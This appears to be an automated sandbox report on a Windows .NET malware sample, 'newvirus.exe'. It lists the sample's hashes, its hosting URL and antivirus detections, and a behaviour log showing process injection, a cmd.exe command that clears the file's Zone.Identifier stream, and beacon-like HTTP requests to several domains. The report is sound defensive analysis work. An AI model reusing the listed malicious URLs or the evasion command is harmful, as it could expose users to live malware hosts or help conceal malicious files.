File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 418.00 KB (428032 bytes) |
Compile time: | 2012-07-22 12:10:38 |
MD5: | 68822582a0974bfea5b912a44c64c2a8 |
SHA1: | ddbcb2b3fc5c3c0b080094c33bc538da9b8fa524 |
SHA256: | 85d20d316b4d703ca77d440e452e5754af0e53433604dfbcccef7d0dda866e71 |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 3 | import resource relocation |
First submission: | 2019-08-07 20:39:07 |
Last submission: | 2019-08-07 20:39:07 |
Filename detected: |
- newvirus.exe (1) |
URL file hosting |
---|
hXXp://raatphailihai.com/newvirus.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2019-07-26 05:20:35 | [35/69] | ![]() |
PE Sections 2 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x67cf4 | 425472 | d5fca4fa4015894cb043f7d76abf6e8b | 78189b84d5b6dedbd56e0e1b0c1386bb7e6d5427 |
.rsrc | 0x6a000 | 0x600 | 1536 | 081e22eb171edbbd78dca224ac280409 | 2147855e1ffe7fb8cece63530e08eb0f53ffcf9e |
.reloc | 0x6c000 | 0xc | 512 | fb2e784cb070a31f2b66cd7e2ef732f9 | 9ac261c950a36f9b493bcfe5e1c7524eac11fead |
Meta Info | |
---|---|
No Meta found in this file |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
mscoree.dll |
IP Found | |
---|---|
8.12.16.20 |
URL(s) | |
---|---|
No URL found |
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05_64 | Seven05_64 | VirtualBox | 2019-08-07 20:31:46 | 2019-08-07 20:34:48 | 182 |
12 Behaviors detected by system signatures
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: newvirus.exe(2252) -> newvirus.exe(1016)
Uses Windows utilities for basic functionality
Severity: Medium
Confidence: High
- command: cmd.exe /C type nul > "C:\Users\Seven01\AppData\Local\Temp\newvirus.exe:Zone.Identifier"
- command: cmd.exe /C type nul > "C:\Users\Seven01\AppData\Local\Temp\newvirus.exe:Zone.Identifier"
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.61, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00067e00, virtual_size: 0x00067cf4
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.masterremorque.com/hx329/?GzuX=qaK8qULPVC9SyPRUGH8vlqtgeeO97i/71ahpZD9a9PMHCu1qtv4eo/DF33u5QbZAdWBzB6NE&AnB=O0DXNTu0N0
- url: http://www.sapporconsulting.com/hx329/?GzuX=RUfkc6NbgWQ9FQru2+qlvn8vqEnGz/H7iCazUSVR9YXxDYT3zQOJdhC8S/PLWcbqmwrPRqFl&AnB=O0DXNTu0N0
- url: http://www.sapporconsulting.com/hx329/
- url: http://www.doamensdressshoesok.live/hx329/?GzuX=nKkiChOGeB4s2KtJF2wMZXqzcSd69b2yHmVfFwcNTXAYAfq10n0gWy50MRWEqSU3+Ob2TpJg&AnB=O0DXNTu0N0
- url: http://www.doamensdressshoesok.live/hx329/
- url: http://www.yheeee.com/hx329/?GzuX=/+eWJHc7ouCsXwy3w5/VAkCueLXbW0w075lArABbWyTiT/0rBn4EXH4ISPnZFipT1sUyeclS&AnB=O0DXNTu0N0
- url: http://www.yheeee.com/hx329/
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://www.masterremorque.com/hx329/?GzuX=qaK8qULPVC9SyPRUGH8vlqtgeeO97i/71ahpZD9a9PMHCu1qtv4eo/DF33u5QbZAdWBzB6NE&AnB=O0DXNTu0N0
- suspicious_request: http://www.sapporconsulting.com/hx329/?GzuX=RUfkc6NbgWQ9FQru2+qlvn8vqEnGz/H7iCazUSVR9YXxDYT3zQOJdhC8S/PLWcbqmwrPRqFl&AnB=O0DXNTu0N0
- suspicious_request: http://www.sapporconsulting.com/hx329/
- suspicious_request: http://www.doamensdressshoesok.live/hx329/?GzuX=nKkiChOGeB4s2KtJF2wMZXqzcSd69b2yHmVfFwcNTXAYAfq10n0gWy50MRWEqSU3+Ob2TpJg&AnB=O0DXNTu0N0
- suspicious_request: http://www.doamensdressshoesok.live/hx329/
- suspicious_request: http://www.yheeee.com/hx329/?GzuX=/+eWJHc7ouCsXwy3w5/VAkCueLXbW0w075lArABbWyTiT/0rBn4EXH4ISPnZFipT1sUyeclS&AnB=O0DXNTu0N0
- suspicious_request: http://www.yheeee.com/hx329/
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: newvirus.exe -> cmd.exe
- Process: newvirus.exe -> cmd.exe
- Process: newvirus.exe -> C:\Users\Seven01\AppData\Local\Temp\newvirus.exe
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
- DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
- DynamicLoader: ADVAPI32.dll/RegEnumValueW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: mscoreei.dll/RegisterShimImplCallback
- DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
- DynamicLoader: mscoreei.dll/SetShellShimInstance
- DynamicLoader: mscoreei.dll/OnShimDllMainCalled
- DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
- DynamicLoader: mscoreei.dll/_CorExeMain
- DynamicLoader: SHLWAPI.dll/UrlIsW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: clr.dll/SetRuntimeInfo
- DynamicLoader: clr.dll/_CorExeMain
- DynamicLoader: MSCOREE.DLL/CreateConfigStream
- DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream
- DynamicLoader: KERNEL32.dll/GetNumaHighestNodeNumber
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/AddSIDToBoundaryDescriptor
- DynamicLoader: KERNEL32.dll/CreateBoundaryDescriptorW
- DynamicLoader: KERNEL32.dll/CreatePrivateNamespaceW
- DynamicLoader: KERNEL32.dll/OpenPrivateNamespaceW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/DeleteBoundaryDescriptor
- DynamicLoader: KERNEL32.dll/WerRegisterRuntimeExceptionModule
- DynamicLoader: KERNEL32.dll/RaiseException
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: mscoreei.dll/
- DynamicLoader: KERNELBASE.dll/SetSystemFileCacheSize
- DynamicLoader: ntdll.dll/NtSetSystemInformation
- DynamicLoader: KERNELBASE.dll/PrivIsDllSynchronizationHeld
- DynamicLoader: KERNEL32.dll/AddDllDirectory
- DynamicLoader: KERNEL32.dll/SortGetHandle
- DynamicLoader: KERNEL32.dll/SortCloseHandle
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: ole32.dll/CoGetContextToken
- DynamicLoader: clrjit.dll/sxsJitStartup
- DynamicLoader: clrjit.dll/getJit
- DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/QueryPerformanceFrequency
- DynamicLoader: KERNEL32.dll/QueryPerformanceCounter
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptImportKey
- DynamicLoader: CRYPTSP.dll/CryptExportKey
- DynamicLoader: CRYPTSP.dll/CryptCreateHash
- DynamicLoader: CRYPTSP.dll/CryptHashData
- DynamicLoader: CRYPTSP.dll/CryptGetHashParam
- DynamicLoader: CRYPTSP.dll/CryptDestroyHash
- DynamicLoader: CRYPTSP.dll/CryptDestroyKey
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/ExpandEnvironmentStrings
- DynamicLoader: KERNEL32.dll/ExpandEnvironmentStringsW
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/LocaleNameToLCID
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/LCIDToLocaleName
- DynamicLoader: KERNEL32.dll/GetUserPreferredUILanguages
- DynamicLoader: KERNEL32.dll/LocalAlloc
- DynamicLoader: shell32.dll/ShellExecuteEx
- DynamicLoader: shell32.dll/ShellExecuteExW
- DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
- DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
- DynamicLoader: comctl32.dll/
- DynamicLoader: comctl32.dll/
- DynamicLoader: KERNEL32.dll/LocalFree
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: KERNEL32.dll/DuplicateHandle
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: ole32.dll/CoWaitForMultipleHandles
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptGenRandom
- DynamicLoader: ole32.dll/NdrOleInitializeExtension
- DynamicLoader: ole32.dll/CoGetClassObject
- DynamicLoader: ole32.dll/CoGetMarshalSizeMax
- DynamicLoader: ole32.dll/CoMarshalInterface
- DynamicLoader: ole32.dll/CoUnmarshalInterface
- DynamicLoader: ole32.dll/StringFromIID
- DynamicLoader: ole32.dll/CoGetPSClsid
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: ole32.dll/CoReleaseMarshalData
- DynamicLoader: ole32.dll/DcomChannelSetHResult
- DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: nlssorting.dll/SortGetHandle
- DynamicLoader: nlssorting.dll/SortCloseHandle
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetCurrentProcessId
- DynamicLoader: KERNEL32.dll/GetCurrentProcessIdW
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
- DynamicLoader: KERNEL32.dll/OpenProcess
- DynamicLoader: KERNEL32.dll/OpenProcessW
- DynamicLoader: PSAPI.DLL/EnumProcessModules
- DynamicLoader: PSAPI.DLL/EnumProcessModulesW
- DynamicLoader: PSAPI.DLL/GetModuleInformation
- DynamicLoader: PSAPI.DLL/GetModuleInformationW
- DynamicLoader: PSAPI.DLL/GetModuleBaseName
- DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
- DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: KERNEL32.dll/CompareStringOrdinal
- DynamicLoader: KERNEL32.dll/GetFullPathName
- DynamicLoader: KERNEL32.dll/GetFullPathNameW
- DynamicLoader: KERNEL32.dll/SetThreadErrorMode
- DynamicLoader: KERNEL32.dll/GetFileAttributesEx
- DynamicLoader: KERNEL32.dll/GetFileAttributesExW
- DynamicLoader: KERNEL32.dll/ResolveLocaleName
- DynamicLoader: gdiplus.dll/GdiplusStartup
- DynamicLoader: KERNEL32.dll/IsProcessorFeaturePresent
- DynamicLoader: USER32.dll/GetWindowInfo
- DynamicLoader: USER32.dll/GetAncestor
- DynamicLoader: USER32.dll/GetMonitorInfoA
- DynamicLoader: USER32.dll/EnumDisplayMonitors
- DynamicLoader: USER32.dll/EnumDisplayDevicesA
- DynamicLoader: GDI32.dll/ExtTextOutW
- DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
- DynamicLoader: gdiplus.dll/GdipLoadImageFromStream
- DynamicLoader: WindowsCodecs.dll/DllGetClassObject
- DynamicLoader: KERNEL32.dll/WerRegisterMemoryBlock
- DynamicLoader: gdiplus.dll/GdipImageForceValidation
- DynamicLoader: gdiplus.dll/GdipGetImageType
- DynamicLoader: gdiplus.dll/GdipGetImageRawFormat
- DynamicLoader: gdiplus.dll/GdipGetImageWidth
- DynamicLoader: gdiplus.dll/GdipGetImageHeight
- DynamicLoader: gdiplus.dll/GdipGetImageEncodersSize
- DynamicLoader: gdiplus.dll/GdipGetImageEncoders
- DynamicLoader: gdiplus.dll/GdipSaveImageToStream
- DynamicLoader: gdiplus.dll/GdipCreateBitmapFromStream
- DynamicLoader: gdiplus.dll/GdipBitmapLockBits
- DynamicLoader: gdiplus.dll/GdipBitmapUnlockBits
- DynamicLoader: bcrypt.dll/BCryptGetFipsAlgorithmMode
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueEx
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegSetValueEx
- DynamicLoader: ADVAPI32.dll/RegSetValueExW
- DynamicLoader: ole32.dll/CoCreateGuid
- DynamicLoader: KERNEL32.dll/GetCurrentDirectory
- DynamicLoader: KERNEL32.dll/GetCurrentDirectoryW
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/CreateProcess
- DynamicLoader: KERNEL32.dll/CreateProcessA
- DynamicLoader: KERNEL32.dll/WideCharToMultiByte
- DynamicLoader: KERNEL32.dll/GetThreadContext
- DynamicLoader: KERNEL32.dll/ReadProcessMemory
- DynamicLoader: KERNEL32.dll/VirtualAllocEx
- DynamicLoader: KERNEL32.dll/WriteProcessMemory
- DynamicLoader: KERNEL32.dll/SetThreadContext
- DynamicLoader: KERNEL32.dll/ResumeThread
- DynamicLoader: KERNEL32.dll/CreateFile
- DynamicLoader: KERNEL32.dll/CreateFileW
- DynamicLoader: KERNEL32.dll/GetFileType
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: gdiplus.dll/GdipDisposeImage
- DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
- DynamicLoader: comctl32.dll/
- DynamicLoader: KERNEL32.dll/CreateActCtxW
- DynamicLoader: KERNEL32.dll/AddRefActCtx
- DynamicLoader: KERNEL32.dll/ReleaseActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: kernel32.dll/SetThreadUILanguage
- DynamicLoader: kernel32.dll/CopyFileExW
- DynamicLoader: kernel32.dll/IsDebuggerPresent
- DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
- DynamicLoader: kernel32.dll/SetThreadUILanguage
- DynamicLoader: kernel32.dll/CopyFileExW
- DynamicLoader: kernel32.dll/IsDebuggerPresent
- DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Creates RWX memory
Severity: Medium
Confidence: Medium
Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution
Severity: Low
Confidence: Very High
- command: cmd.exe /C type nul > "C:\Users\Seven01\AppData\Local\Temp\newvirus.exe:Zone.Identifier"
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05_64 | Seven05_64 | VirtualBox | 2019-08-07 20:31:46 | 2019-08-07 20:34:48 | 182 |
8 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\newvirus.exe.config C:\Users\Seven01\AppData\Local\Temp\newvirus.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\* C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll \Device\KsecDD C:\Windows\assembly\NativeImages_v4.0.30319_32\dyQ6aw6zBFO0dc3e313#\* C:\Users\Seven01\AppData\Local\Temp\newvirus.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll C:\Windows\Microsoft.Net\assembly\GAC_32\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\* C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\VERSION.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll \??\MountPointManager C:\Users\Seven01\AppData\Local\Temp\dbINVxK.dll C:\Users\Seven01\AppData\Local\Temp\dbINVxK\dbINVxK.dll C:\Users\Seven01\AppData\Local\Temp\dbINVxK.exe C:\Users\Seven01\AppData\Local\Temp\dbINVxK\dbINVxK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\Microsoft.Net\assembly\GAC_32\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\* 